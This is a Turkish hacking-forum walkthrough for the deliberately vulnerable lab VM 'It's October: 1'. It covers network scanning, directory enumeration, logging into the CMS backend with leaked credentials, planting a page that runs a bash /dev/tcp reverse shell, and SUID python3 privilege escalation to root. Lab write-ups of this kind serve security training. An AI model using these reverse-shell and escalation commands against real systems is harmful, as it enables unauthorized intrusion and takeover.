It’s October: 1 Zafiyetli Makinesinin Çözüm

KelHack

Yeni üye
1 Ağu 2012
27
0
Merhabalar TürkHackTeam ailesi, bugün sizlere "It’s October: 1 Zafiyetli Makinesinin Çözümünü" göstereceğim.

Öncelikle zafiyetli makinemizi buradan indirelim
BURADAN

Makine adı: It’s October: 1
Hedef: Hedefin kök bayrağını alın.
Zorluk: Kolay / Orta Seviye
İşletim Sistemi : Linux
Yayınlanma tarihi : 8 Nis 2020
Yapımcı : Akanksha Sachin Verma

Evet arkadaşlar açıklamaları da yaptığımıza göre başlayalım.

İlk önce makinenin ip adresini öğrenelim. Bunun için
Kod:
Netdiscover –r  10.0.2.0/24
( tüm ipleri tarıyoruz) yazıyoruz.

c2P9dJ.jpg


Görüldüğü üzere hedef makine 10.0.2.4 ipsine sahip, birde nmap aracımızı kullanarak açık port taraması yapalım.
Bunun için
Kod:
Nmap –A 10.0.2.4
yazalım.

z9PBQT.jpg


Tarama bittikten sonra görüyoruz ki Port 22 ssh / Port 80 http / Port 3306 MySQL / Port 8080 apache tomcat portları açık.
Bir web sitesi bandırıldığı düşünerek
Kod:
http://10.0.2.4
adresine gittim.

JQJTGb.jpg


Sayfa kaynağını incelediğimde burada pek bir bilgi edinemediğimi fark ettim, ardından 8080 portuna yöneldim.
Kod:
http://10.0.2.4:8080
ve gelen sayfayı inceledim.

8Q51M3.jpg


Buraya geldiğimde sayfa kaynağı incelediğimde ilk ipucumuzu bulduk “mynote.txt” adında bir dosya gördüm bakalım bize ne verecek.
Kod:
http://10.0.2.4:8080/mynote.txt
yazıp enter dediğimizde bize bir kullanıcı adı ve şifre veriyor.

bKT0C9.jpg


Şimdi anlıyorum ki bir admin paneli var onu bulmalıyız.
Öncelikle sayfamızın bütün dizinlerini taramalıyız. Bunun için terminalde
Kod:
dirb http://10.0.2.4
yazalım ve taramayı başlatalım.

C7PxcC.jpg


Tarama yaparken bulunan dizinleri denediğim için 2 dizinde giriş ekranını buldum.
Kod:
http://10.0.2.4/backend
yazalım.

fP3HaN.jpg


Biraz incelediğimizde içerek yönetim paneli olduğu fark ediyoruz. Bulduğum şifreler ile giriş yapalım ve inceleyelim.

BO0a92.jpg


Resimde de görüldüğü üzere bir sayfa ekleyebiliyoruz. Lakin bizden sunucuya erişim isteniyor bunun için reverse Shell yapabiliriz. Cms sekmesin “Add” yazan yere tıklayıp yeni sayfa oluşturalım ve size vereceğim kodları yazalım.

IV7cQf.jpg


İp adresi yazan yere kendi ipimizi ve dinleyeceğimiz portu yazıyoruz.
Kod:
function onstart(){
    exec("/bin/bash -c 'bash -i >& /dev/tcp/ip_adresi/port 0>&1'");
    }
İp adresimizi bilmiyorsak öğrenmek için yeni terminal açıp “ifconfig” yazmamız yeterli.

d7VMCP.jpg


İnet yazan yerin yanında ip adresimiz yazmaktadır.
Sayfaya bir isim koyup kaydelim ben sayfa adını bash yaptım.
Ben 1234 portuna bağladım, netcat ile 1234 portunu dinlemeye başlayalım. Bunun için yeni terminal açıp
Kod:
nc –lvp 1234
yazalım.

IKGLRH.jpg


Ve dinlemeye başladık. Yeni oluşturduğumuz sayfayı açalım.
Kod:
http://10.0.2.4/bash
“bash” yazıyorum çünkü sayfa adını öyle yapmıştım. Sizde koyduğunuz sayfa adını yazınız.

Q3z7cb.jpg


Ve ilk bağlantımızı sağlıyoruz.
Kod:
clear
komutu yazalım bir deneme amaçlı.

c3xa2d.jpg


Gördüğünüz gibi “TERM environment variable not set.” Yazıyor yani ortam değişkeni ayarlanmadı diyor. Ayarlamak içinse
Kod:
 export TERM=screen
yazalım ve ardından “clear” ve “ls –la” yazalım.

xG3I55.jpg


Eğer ekranınız böyleyse sorun yoktur. Devam edelim. Şimdi
Kod:
 cd /home
yazıp home klasörüne gidelim ardından
Kod:
ls –la
yazalım.

HLHJGa.jpg


İşlemlere devam edelim ve
Kod:
cd armour
yazarak armour klasörüne gidelim ve orada “ls –la” yapıp içeriği görelim.

M15K6N.jpg


İstediğimiz klasörlere ulaşamadık maalesef. Birde arama yöntemini deneyelim önce
Kod:
clear
yazalım ardından da
Kod:
find / -perm -u=s -type f 2>/dev/null
komutunu girelim

1Ldc2B.jpg



Evet görüldüğü üzere python 3.7 yüklü sunucumuzda artık yetki yükseltme yapalım. Ve kendimizi root konumuna getirelim.
Öncelikle clear yaparak terminali temizleyelim. Daha sonra ise
Kod:
python3 -c 'import os;os.execl("/bin/bash", "bash", "-p")'
komutlarını yazalım id diyerek öğrenelim.

VHJ5Nf.jpg


Kod:
clear
yazarak daha devam ediyoruz.
Kod:
python3 -c 'import pty;pty.spawn("/bin/bash")'
komutlarını yazıyoruz. Bu komutla birlikte non-interactive bir shelli interactive bir shelle çevirme işlemini yapıyoruz. Ve bu komutu doğru yaptıysanız ekranınız bu şekilde olmalı.

KfLe56.jpg


Burada tekrardan
Kod:
python3 -c 'import os;os.execl("/bin/bash", "bash", "-p")'
komutu çalıştırıyoruz. Ardından
Kod:
 cd /root
yazarak root klasörüne geçiş yapıyoruz.

c9bLTx.jpg


Evet beklenen an geldi son olarak
Kod:
ls
komutunu çalıştırıyoruz. Hemen ardından
Kod:
cat proof.txt
diyerek flag’ımızı alıyoruz.

yGe0cx.jpg


Uzun bir konu oldu arkadaşlar. Siber güvenlik alanında daha çok yeniyim. Bazı hatalarım olduysa kusura bakmayın. Bir sonra ki konularda tekrardan görüşmek dileğiyle.
 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.